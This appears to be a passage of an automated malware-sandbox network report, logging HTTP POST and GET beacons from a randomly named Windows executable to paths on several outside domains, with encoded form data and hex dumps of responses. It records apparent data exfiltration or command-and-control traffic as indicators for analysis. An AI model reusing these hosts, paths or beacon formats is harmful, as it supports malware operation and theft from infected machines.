                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 6d 77 e3 36 b2 35 fa d9 5e eb f9 0f 68 f6 4d da ee 98 2f a2 de 65 c9 39 49 4f e7 4c ce 4a 26 b9 e9 64 66 9d 93 ce f2 82 c8 a2 88 36 08 30 00 68 59 f1 f8 bf df 02 49 49 94 4c d9 ee 97 cc 99 e7 3a 69 11 40 55 ed da b5 6b 4f 9f fd e5 87 57 3f ff f7 8f af 49 6a 32 7e 71 3c b5 1f 12 33 35 73 b8 51 0e e1 54 2c 66 0e 08 f7 97 37 0e c9 15 24 ec 66 e6 c8 c5 04 d3 4d ae 27 be 2f 17 b9 97 81 2f f4 73 c7 56 03 8d 2f 8e 8f a6 19 18 4a a2 94 2a 0d 66 e6 fc f2 f3 37 ee c8 21 fe c5 f1 3a 24 68 06 33 e7 9a c1 32 97 ca 38 24 92 c2 80 c0 d4 25 8b 4d 3a 8b e1 9a 45 e0 96 97 33 c2 04 33 8c 72 57 47 94 c3 ac e3 05 67 24 a3 37 2c 2b b2 f5 d3 1a 9b 33 71 45 14 f0 99 93 2b 99 30 0e 0e 49 91 f3 cc f1 fd 45 96 2f 3c a9 16 fe 4d 22 fc 4e 55 71 84 7f 8d 1a 9d 22 97 a8 30 84 21 9d 75 e5 7a ce 6e 54 cc 41 33 a4 a9 98 54 1e 13 fe 32 77 6b da be 49 21 03 ed 0b 29 05 f3 59 46 17 78 49 e8 b5 c5 f1 f0 67 d3 0c db e9 48 b1 dc 5c c4 32 2a 32 2c f5 d6 87 d7 1c ca 7b c4 a9 d6 7f 43 79 [TRUNCATED]
                                                    Data Ascii: 1faamw65^hM/e9IOLJ&df60hYIIL:i@UkOW?Ij2~q<35sQT,f7$fM'//sV/J*f7!:$h328$%M:E33rWGg$7,+3qE+0IE/<M"NUq"0!uznTA3T2wkI!)YFxIgH\2*2,{Cy<!@4y/id5UCf8\$1(thSJF=\|9 yyO\B HfumfK{nj%oi{QH*GE0)|N2ad^-QTq&o*9sch:_16;RE6icsXp%o}17*e2Rt}Oost+0Uj'smz}(}foqL)<krA-`yr&1T,p[I9 HV?s]J?`#]{)y^<[Uc"bQ}?Re~H$JGO,o&=5XoMivSu:hW4.8'L7 {q|<sLr].#Jfy
                                                    Jul 3, 2024 17:53:27.542632103 CEST1236INData Raw: e7 3f c9 af bf 9d 6f c0 fe cf f1 94 33 71 45 14 f0 d9 8b 58 68 37 57 90 80 89 d2 17 24 c5 d3 ec 85 7f 9f e0 0b e2 5f 3c 5e a6 0d 35 da 5b e6 5e 24 b3 a7 55 24 52 60 c5 42 ca 05 07 9a 33 fd f4 4a 16 1c 68 84 a9 91 14 02 22 b3 4e ae 84 df 34 b3 2c
                                                    Data Ascii: ?o3qEXh7W$_<^5[^$U$R`B3Jh"N4,YTFJj-[;08h&byYTWZqq11\yN&qOZ?,Y8yDuzPmSfHAre+Ad"K["9/#/zq/o1FW%kZ*VMk:
                                                    Jul 3, 2024 17:53:27.542643070 CEST1236INData Raw: 25 6e be 5c 03 ea d4 0a 66 2a bd c4 6c f3 72 7a 6b d4 aa 7c 84 d9 7f bd f9 e1 6f 5e 4e 15 56 68 d0 1a c3 6f 8c 54 74 01 76 fd df 1a c8 4e e4 e9 e9 39 4b 4e 1c 39 7f 07 91 71 66 6b 9d 50 21 47 14 d9 1c 54 e3 cd 33 2c 03 b4 63 96 a3 7e 96 ce 5f 70
                                                    Data Ascii: %n\f*lrzk|o^NVhoTtvN9KN9qfkP!GT3,c~_pA5N_(Z1Sn|ATwu\dT9R]-= ^QqMu{/?}S{5N.FO/7F1NNpr|bDq{'8Ab-.9Sl
                                                    Jul 3, 2024 17:53:27.542824984 CEST1236INData Raw: 71 83 34 ba 5e e6 0a 8c 59 fd 98 4a 23 2f 11 a6 39 cd 13 07 69 a0 35 a9 37 80 37 cc bb 5e c7 1b 7c 9a 15 64 94 89 3f 55 fa b2 75 83 79 b7 ff 14 d1 cb aa 36 aa 4c e0 54 b5 59 f6 40 2e 8e bd 6d b2 4e a9 02 c2 19 a1 b7 91 e4 52 4d c8 f3 6f ca bf f3
                                                    Data Ascii: q4^YJ#/9i577^|d?Uuy6LTY@.mNRMoI*Khs)n4Z(Yxl5Vz=@]_w;`uAOa|@2F<Alu!dw<Yq8_SY2pw27
                                                    Jul 3, 2024 17:53:27.542835951 CEST1236INData Raw: 2c 94 fd 3d a7 9c 2d 84 cb 0c 64 7a 42 22 10 06 54 7b 25 b9 20 2f 6f 33 aa 16 4c 20 8b fb 39 96 e3 96 81 bd b5 e7 ec e3 ac a7 45 49 e7 5c 46 57 6e 24 79 91 09 dd 2e 51 d8 14 e8 81 92 86 62 ed 25 b9 d4 c6 c5 a9 91 ae 81 f6 5e 1d 2f ec bf 57 6d a3
                                                    Data Ascii: ,=-dzB"T{% /o3L 9EI\FWn$y.Qb%^/WmK*ZkNvmT*<cY.L_LqO+s[0rxkvbWADM~YAbY[kA9kQu`@T}"^Ay#{E/^AP9?q
                                                    Jul 3, 2024 17:53:27.542845964 CEST1236INData Raw: 6a 2e 6f 3e 54 b5 15 33 a9 db 1c 0f 0f 39 55 3b 12 ae 7b 6c f4 eb 78 3d 2f ec 3c 2e e0 86 bd 93 e3 af a4 b1 43 a8 9e 39 e5 28 4e 45 d6 b1 64 35 b2 4d 90 98 f6 16 52 2e 38 d0 9c 69 0f 89 58 d4 2f 13 9a 31 be 9a 7d 6b e7 98 f4 82 e0 ac 8f ff 86 41
                                                    Data Ascii: j.o>T39U;{lx=/<.C9(NEd5MR.8iX/1}kA;:9]KIp;hsHVYJT7)3s1RG/Pg@KK23)d4oVki.i>-U|4SS+_?Z'(2qe>5x%h"
                                                    Jul 3, 2024 17:53:27.542851925 CEST1236INData Raw: 1a a5 7a 27 5a 66 b0 ee 4c 64 5e 52 23 73 48 d0 91 04 65 40 ce c4 a4 4c 6f 52 8c ac 68 59 6d 36 ad 0a 81 da 33 4e e7 1c f6 c6 da a9 c5 63 23 f3 c9 f3 fc 49 16 8c 24 de 85 f1 73 5e 2c 98 40 1b 4a 89 6d 33 50 11 f8 54 6b 30 a5 39 13 55 a6 c5 7e ab
                                                    Data Ascii: z'ZfLd^R#sHe@LoRhYm63Nc#I$s^,@Jm3PTk09U~{>j=C7jl4b<h?wV=7GxC/ki>p Q+yKOTANKEu/?}:<,*e8_o*<zxD1 '8r-
                                                    Jul 3, 2024 17:53:27.543112993 CEST1236INData Raw: b4 59 71 f0 52 60 8b d4 54 86 4b bf 70 f2 1b a7 2e 7b 0c fe 0b e7 72 a9 68 9e 83 72 1e ec 74 bb 76 c4 a3 1d b7 29 31 d3 39 a7 2b cc 71 e6 5c 46 57 ce ce f4 77 24 a2 26 4a 4f e0 b4 c6 8e a4 d0 12 cb b8 5c 9c 38 df 50 c6 0b 05 84 1a f2 a3 02 cd fe
                                                    Data Ascii: YqR`TKp.{rhrtv)19+q\FWw$&JO\8P"o|$Ob8,g2GevQt*)sQ"Ly=S<vRaCWzB,>LHFW%RM;VlE'1*bcp:~qG
                                                    Jul 3, 2024 17:53:27.543306112 CEST1236INData Raw: 59 b6 70 08 8b ef 3d d1 c8 30 29 1e f1 60 59 e0 e5 69 ee 90 0c 4c 2a 11 26 97 1a 09 4c f3 1d 35 dd 42 83 b2 9d 6b 6a 53 4e e7 c0 09 76 9a 39 36 74 59 69 8e e6 2a 03 75 12 13 79 61 88 59 e5 96 30 dc 18 a7 26 8f c9 15 e5 46 29 a1 85 91 91 cc 72 0e
                                                    Data Ascii: Yp=0)`YiL*&L5BkjSNv96tYi*uyaY0&F)rHoMr5~~tT!6M};_ePLtG)DWcM lnTsQVj\T-=Ou|kM8bGw#56o\kyabU7l!5)e
                                                    Jul 3, 2024 17:53:27.543318033 CEST1236INData Raw: 2c 36 e9 cc 09 37 0f 9c 09 78 27 99 98 39 4a 16 22 de bc c7 54 a7 54 29 ba 9a 39 7d d2 6f 57 24 f0 86 25 b9 f0 55 79 1c e3 50 a3 01 2e 0d 2f 23 32 1e 79 83 9e 3d 8f 7b 64 3c c4 35 be ea e2 32 ec 31 1c d8 a4 0e 5a 13 9d 30 c6 31 87 e8 74 bc 63 3a
                                                    Data Ascii: ,67x'9J"TT)9}oW$%UyP./#2y={d<521Z01tc::#8a_d/xXl&ayz3b}0X#GUZbf?^o6EnbT6@u?&.J:DNC^k,'}Cr[
                                                    Jul 3, 2024 17:53:27.547791004 CEST1236INData Raw: 39 c4 9a 98 a5 53 97 ec 52 bd ac c6 d8 88 f0 81 74 42 3a ea 8c c7 a3 46 64 c9 e2 05 18 17 71 58 8c a2 ba d7 0c 96 2e c7 16 f7 72 0e 16 35 b8 d7 f8 ad dc ab a2 3a 54 5d ea 48 8d e3 c5 90 d0 82 9b 07 67 ab 5b ef 09 31 d5 66 85 1e f4 5f 3e db b2 24
                                                    Data Ascii: 9SRtB:FdqX.r5:T]Hg[1f_>$.zaxn0p wh[w\*)'B8ZN:M#d&(fNz5::y[fZmX>uHAL{swP9]MMzyFojy~


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.64976945.113.122.18805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:28.614392996 CEST1653OUTPOST /n8zi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    Origin: http://www.3cubesinterior.in
                                                    Referer: http://www.3cubesinterior.in/n8zi/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 65 42 6c 57 30 4d 67 73 2f 48 31 2b 50 61 54 41 79 37 6c 32 41 74 6c 6f 46 5a 58 50 62 5a 4a 66 4c 2b 74 41 36 59 7a 32 5a 6b 62 56 71 2b 2f 52 41 2b 32 44 70 78 39 51 67 6b 7a 68 50 74 52 37 47 35 68 2f 41 6a 68 52 51 33 49 59 49 58 4e 52 72 2f 73 32 2f 44 6c 4f 71 78 6e 4b 52 57 4a 4c 6e 54 2b 56 44 4f 34 79 38 79 2b 5a 55 4b 61 37 33 42 59 4b 57 31 47 77 52 4c 51 32 47 64 37 31 47 63 75 68 4f 72 64 49 42 44 35 52 45 47 38 32 4c 4a 45 36 4e 39 6d 64 6b 51 73 59 38 66 68 74 70 53 76 57 36 51 71 43 6d 39 41 32 50 59 66 43 59 62 4d 5a 4d 44 7a 66 6d 69 4f 57 78 4e 6f 72 2b 6a 2b 42 63 4f 45 37 6b 52 46 51 6f 56 36 2f 76 4d 67 63 37 69 36 48 57 2b 46 58 48 45 45 4b 59 67 37 59 71 66 78 39 37 68 5a 39 68 50 50 75 78 4c 52 63 57 72 6a 73 4c 41 36 67 7a 77 76 66 2f 71 4f 32 49 6d 38 42 43 30 6f 4e 46 59 70 38 52 54 2f 4d 39 71 53 6a 7a 31 63 79 4c 2b 41 4d 48 59 74 30 69 58 64 6d 41 4e 4c 74 73 2f 33 67 48 30 4b 75 44 51 37 6d 65 71 36 43 73 70 57 45 36 4b 70 45 6b 41 68 62 52 63 [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=eBlW0Mgs/H1+PaTAy7l2AtloFZXPbZJfL+tA6Yz2ZkbVq+/RA+2Dpx9QgkzhPtR7G5h/AjhRQ3IYIXNRr/s2/DlOqxnKRWJLnT+VDO4y8y+ZUKa73BYKW1GwRLQ2Gd71GcuhOrdIBD5REG82LJE6N9mdkQsY8fhtpSvW6QqCm9A2PYfCYbMZMDzfmiOWxNor+j+BcOE7kRFQoV6/vMgc7i6HW+FXHEEKYg7Yqfx97hZ9hPPuxLRcWrjsLA6gzwvf/qO2Im8BC0oNFYp8RT/M9qSjz1cyL+AMHYt0iXdmANLts/3gH0KuDQ7meq6CspWE6KpEkAhbRcRVoydSne4j655jI6E4KnpKftrdfICOOBRdgfocJX0lnBtZDiQZLdE126G0yXxs5oEpRrGqf9eYB/3N0ey1R8NJSJBo/bX7AeMbHaP9gPCRu6s1K7j81BgMnsfDvpzU74+Vh3UAQ87/8FDV417PV0a1RB5Rb2u8mUy8ZrWM5NpXeeoetOiDER0gFl/HkjJBtn+nYjNOsr3xAhj/sgbi3Rdvcis2c73TelK1Jmn2ew5w2mVHfgXJgQ1Mya0lLH1ziDwZqZI5LIaUShDmJjyVYW/AtvF6Mcwzo2mpocVuNt0IawdySX2RJjnsT0qkE+cI1MzxI4g1pcj+XfMhqYoHuJ14Uhl3rkHC0UGR7UiglutlifohSNDoWFV0Wke128hlufrFdqXBRcx/YstpowIMGC81hxCdjQEZDuc/dyOOgFwue45YqzG41Jr3yaTHfnPNpvxayYlQ74HoRpQVQN49EpFh6gbFWJ5sOSC3nuVYpHCMStjAOMK4qzSCbzw87WLFz2Q+5WWHnby7wmJuAClEWLImKZ3AL77bxPxDrUdCVsPPV3QeOz2K3HhfadM7kvqXRXKFoq9AmIuT/uiloQrdV4sovmsS+xx0bXlLn1lPyTPwtGb/KEK7RdbqgcrHZ6g9rAjyO0k4d4/LjNMWLbiGFEvEVO32iK2/pBJz [TRUNCATED]
                                                    Jul 3, 2024 17:53:30.143215895 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:29 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 6d 77 e3 36 b2 35 fa d9 5e eb f9 0f 68 f6 4d da ee 98 2f a2 de 65 c9 39 49 4f e7 4c ce 4a 26 b9 e9 64 66 9d 93 ce f2 82 c8 a2 88 36 08 30 00 68 59 f1 f8 bf df 02 49 49 94 4c d9 ee 97 cc 99 e7 3a 69 11 40 55 ed da b5 6b 4f 9f fd e5 87 57 3f ff f7 8f af 49 6a 32 7e 71 3c b5 1f 12 33 35 73 b8 51 0e e1 54 2c 66 0e 08 f7 97 37 0e c9 15 24 ec 66 e6 c8 c5 04 d3 4d ae 27 be 2f 17 b9 97 81 2f f4 73 c7 56 03 8d 2f 8e 8f a6 19 18 4a a2 94 2a 0d 66 e6 fc f2 f3 37 ee c8 21 fe c5 f1 3a 24 68 06 33 e7 9a c1 32 97 ca 38 24 92 c2 80 c0 d4 25 8b 4d 3a 8b e1 9a 45 e0 96 97 33 c2 04 33 8c 72 57 47 94 c3 ac e3 05 67 24 a3 37 2c 2b b2 f5 d3 1a 9b 33 71 45 14 f0 99 93 2b 99 30 0e 0e 49 91 f3 cc f1 fd 45 96 2f 3c a9 16 fe 4d 22 fc 4e 55 71 84 7f 8d 1a 9d 22 97 a8 30 84 21 9d 75 e5 7a ce 6e 54 cc 41 33 a4 a9 98 54 1e 13 fe 32 77 6b da be 49 21 03 ed 0b 29 05 f3 59 46 17 78 49 e8 b5 c5 f1 f0 67 d3 0c db e9 48 b1 dc 5c c4 32 2a 32 2c f5 d6 87 d7 1c ca 7b c4 a9 d6 7f 43 79 [TRUNCATED]
                                                    Data Ascii: 1faamw65^hM/e9IOLJ&df60hYIIL:i@UkOW?Ij2~q<35sQT,f7$fM'//sV/J*f7!:$h328$%M:E33rWGg$7,+3qE+0IE/<M"NUq"0!uznTA3T2wkI!)YFxIgH\2*2,{Cy<!@4y/id5UCf8\$1(thSJF=\|9 yyO\B HfumfK{nj%oi{QH*GE0)|N2ad^-QTq&o*9sch:_16;RE6icsXp%o}17*e2Rt}Oost+0Uj'smz}(}foqL)<krA-`yr&1T,p[I9 HV?s]J?`#]{)y^<[Uc"bQ}?Re~H$JGO,o&=5XoMivSu:hW4.8'L7 {q|<sLr].#Jfy
                                                    Jul 3, 2024 17:53:30.143230915 CEST1236INData Raw: e7 3f c9 af bf 9d 6f c0 fe cf f1 94 33 71 45 14 f0 d9 8b 58 68 37 57 90 80 89 d2 17 24 c5 d3 ec 85 7f 9f e0 0b e2 5f 3c 5e a6 0d 35 da 5b e6 5e 24 b3 a7 55 24 52 60 c5 42 ca 05 07 9a 33 fd f4 4a 16 1c 68 84 a9 91 14 02 22 b3 4e ae 84 df 34 b3 2c
                                                    Data Ascii: ?o3qEXh7W$_<^5[^$U$R`B3Jh"N4,YTFJj-[;08h&byYTWZqq11\yN&qOZ?,Y8yDuzPmSfHAre+Ad"K["9/#/zq/o1FW%kZ*VMk:
                                                    Jul 3, 2024 17:53:30.143241882 CEST1236INData Raw: 25 6e be 5c 03 ea d4 0a 66 2a bd c4 6c f3 72 7a 6b d4 aa 7c 84 d9 7f bd f9 e1 6f 5e 4e 15 56 68 d0 1a c3 6f 8c 54 74 01 76 fd df 1a c8 4e e4 e9 e9 39 4b 4e 1c 39 7f 07 91 71 66 6b 9d 50 21 47 14 d9 1c 54 e3 cd 33 2c 03 b4 63 96 a3 7e 96 ce 5f 70
                                                    Data Ascii: %n\f*lrzk|o^NVhoTtvN9KN9qfkP!GT3,c~_pA5N_(Z1Sn|ATwu\dT9R]-= ^QqMu{/?}S{5N.FO/7F1NNpr|bDq{'8Ab-.9Sl
                                                    Jul 3, 2024 17:53:30.143951893 CEST1236INData Raw: 71 83 34 ba 5e e6 0a 8c 59 fd 98 4a 23 2f 11 a6 39 cd 13 07 69 a0 35 a9 37 80 37 cc bb 5e c7 1b 7c 9a 15 64 94 89 3f 55 fa b2 75 83 79 b7 ff 14 d1 cb aa 36 aa 4c e0 54 b5 59 f6 40 2e 8e bd 6d b2 4e a9 02 c2 19 a1 b7 91 e4 52 4d c8 f3 6f ca bf f3
                                                    Data Ascii: q4^YJ#/9i577^|d?Uuy6LTY@.mNRMoI*Khs)n4Z(Yxl5Vz=@]_w;`uAOa|@2F<Alu!dw<Yq8_SY2pw27
                                                    Jul 3, 2024 17:53:30.143964052 CEST1236INData Raw: 2c 94 fd 3d a7 9c 2d 84 cb 0c 64 7a 42 22 10 06 54 7b 25 b9 20 2f 6f 33 aa 16 4c 20 8b fb 39 96 e3 96 81 bd b5 e7 ec e3 ac a7 45 49 e7 5c 46 57 6e 24 79 91 09 dd 2e 51 d8 14 e8 81 92 86 62 ed 25 b9 d4 c6 c5 a9 91 ae 81 f6 5e 1d 2f ec bf 57 6d a3
                                                    Data Ascii: ,=-dzB"T{% /o3L 9EI\FWn$y.Qb%^/WmK*ZkNvmT*<cY.L_LqO+s[0rxkvbWADM~YAbY[kA9kQu`@T}"^Ay#{E/^AP9?q
                                                    Jul 3, 2024 17:53:30.143974066 CEST1236INData Raw: 6a 2e 6f 3e 54 b5 15 33 a9 db 1c 0f 0f 39 55 3b 12 ae 7b 6c f4 eb 78 3d 2f ec 3c 2e e0 86 bd 93 e3 af a4 b1 43 a8 9e 39 e5 28 4e 45 d6 b1 64 35 b2 4d 90 98 f6 16 52 2e 38 d0 9c 69 0f 89 58 d4 2f 13 9a 31 be 9a 7d 6b e7 98 f4 82 e0 ac 8f ff 86 41
                                                    Data Ascii: j.o>T39U;{lx=/<.C9(NEd5MR.8iX/1}kA;:9]KIp;hsHVYJT7)3s1RG/Pg@KK23)d4oVki.i>-U|4SS+_?Z'(2qe>5x%h"
                                                    Jul 3, 2024 17:53:30.143990040 CEST1236INData Raw: 1a a5 7a 27 5a 66 b0 ee 4c 64 5e 52 23 73 48 d0 91 04 65 40 ce c4 a4 4c 6f 52 8c ac 68 59 6d 36 ad 0a 81 da 33 4e e7 1c f6 c6 da a9 c5 63 23 f3 c9 f3 fc 49 16 8c 24 de 85 f1 73 5e 2c 98 40 1b 4a 89 6d 33 50 11 f8 54 6b 30 a5 39 13 55 a6 c5 7e ab
                                                    Data Ascii: z'ZfLd^R#sHe@LoRhYm63Nc#I$s^,@Jm3PTk09U~{>j=C7jl4b<h?wV=7GxC/ki>p Q+yKOTANKEu/?}:<,*e8_o*<zxD1 '8r-
                                                    Jul 3, 2024 17:53:30.144932032 CEST1236INData Raw: b4 59 71 f0 52 60 8b d4 54 86 4b bf 70 f2 1b a7 2e 7b 0c fe 0b e7 72 a9 68 9e 83 72 1e ec 74 bb 76 c4 a3 1d b7 29 31 d3 39 a7 2b cc 71 e6 5c 46 57 ce ce f4 77 24 a2 26 4a 4f e0 b4 c6 8e a4 d0 12 cb b8 5c 9c 38 df 50 c6 0b 05 84 1a f2 a3 02 cd fe
                                                    Data Ascii: YqR`TKp.{rhrtv)19+q\FWw$&JO\8P"o|$Ob8,g2GevQt*)sQ"Ly=S<vRaCWzB,>LHFW%RM;VlE'1*bcp:~qG
                                                    Jul 3, 2024 17:53:30.144943953 CEST1224INData Raw: 59 b6 70 08 8b ef 3d d1 c8 30 29 1e f1 60 59 e0 e5 69 ee 90 0c 4c 2a 11 26 97 1a 09 4c f3 1d 35 dd 42 83 b2 9d 6b 6a 53 4e e7 c0 09 76 9a 39 36 74 59 69 8e e6 2a 03 75 12 13 79 61 88 59 e5 96 30 dc 18 a7 26 8f c9 15 e5 46 29 a1 85 91 91 cc 72 0e
                                                    Data Ascii: Yp=0)`YiL*&L5BkjSNv96tYi*uyaY0&F)rHoMr5~~tT!6M};_ePLtG)DWcM lnTsQVj\T-=Ou|kM8bGw#56o\kyabU7l!5)e
                                                    Jul 3, 2024 17:53:30.144954920 CEST1236INData Raw: 7b 8f db ff ac 7d bf 9d a8 7e 70 97 2c 36 e9 cc 09 37 0f 9c 09 78 27 99 98 39 4a 16 22 de bc c7 54 a7 54 29 ba 9a 39 7d d2 6f 57 24 f0 86 25 b9 f0 55 79 1c e3 50 a3 01 2e 0d 2f 23 32 1e 79 83 9e 3d 8f 7b 64 3c c4 35 be ea e2 32 ec 31 1c d8 a4 0e
                                                    Data Ascii: {}~p,67x'9J"TT)9}oW$%UyP./#2y={d<521Z01tc::#8a_d/xXl&ayz3b}0X#GUZbf?^o6EnbT6@u?&.J:DNC^k,'}
                                                    Jul 3, 2024 17:53:30.145442009 CEST1236INData Raw: 4d 0a ce f1 98 70 b8 a9 5e f0 37 c7 39 c4 9a 98 a5 53 97 ec 52 bd ac c6 d8 88 f0 81 74 42 3a ea 8c c7 a3 46 64 c9 e2 05 18 17 71 58 8c a2 ba d7 0c 96 2e c7 16 f7 72 0e 16 35 b8 d7 f8 ad dc ab a2 3a 54 5d ea 48 8d e3 c5 90 d0 82 9b 07 67 ab 5b ef
                                                    Data Ascii: Mp^79SRtB:FdqX.r5:T]Hg[1f_>$.zaxn0p wh[w\*)'B8ZN:M#d&(fNz5::y[fZmX>uHAL{swP9]MMzyFo


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.64977045.113.122.18805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:31.148272038 CEST349OUTGET /n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.3cubesinterior.in
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:32.511399031 CEST513INHTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 03 Jul 2024 15:53:32 GMT
                                                    Server: nginx/1.23.4
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 0
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=
                                                    X-Server-Cache: true
                                                    X-Proxy-Cache: MISS


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.649772172.217.18.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:43.464940071 CEST625OUTPOST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 34 43 65 53 30 67 67 32 4b 59 73 75 69 54 33 32 76 46 7a 4f 72 66 69 69 71 53 74 55 56 33 35 57 74 6f 59 75 4a 67 30 32 37 4d 48 4a 71 5a 44 41 63 62 7a 67 36 54 74 74 73 6d 53 67 6e 63 53 33 76 78 6c 41 33 56 71 37 6d 77 33 7a 31 4e 56 36 77 6f 38 41 2f 63 6c 35 55 51 51 58 61 79 74 6d 6f 48 4f 74 37 41 66 51 2b 42 31 38 43 6e 39 63 71 2f 4e 4b 69 59 37 62 72 56 73 37 30 58 6e 56 78 49 36 4b 37 57 30 57 4a 71 45 35 4a 53 46 76 6a 49 61 6f 51 4e 67 52 66 38 6c 32 74 69 63 54 5a 67 70 4e 62 63 54 48 58 2b 72 6f 73 55 34 31 46 63 66 6b 69 6e 64 67 4a 77 59 4a 52 4a 31 57
                                                    Data Ascii: 7Dihs8p=Mepd0knFZBCM4CeS0gg2KYsuiT32vFzOrfiiqStUV35WtoYuJg027MHJqZDAcbzg6TttsmSgncS3vxlA3Vq7mw3z1NV6wo8A/cl5UQQXaytmoHOt7AfQ+B18Cn9cq/NKiY7brVs70XnVxI6K7W0WJqE5JSFvjIaoQNgRf8l2ticTZgpNbcTHX+rosU41FcfkindgJwYJRJ1W
                                                    Jul 3, 2024 17:53:44.098350048 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
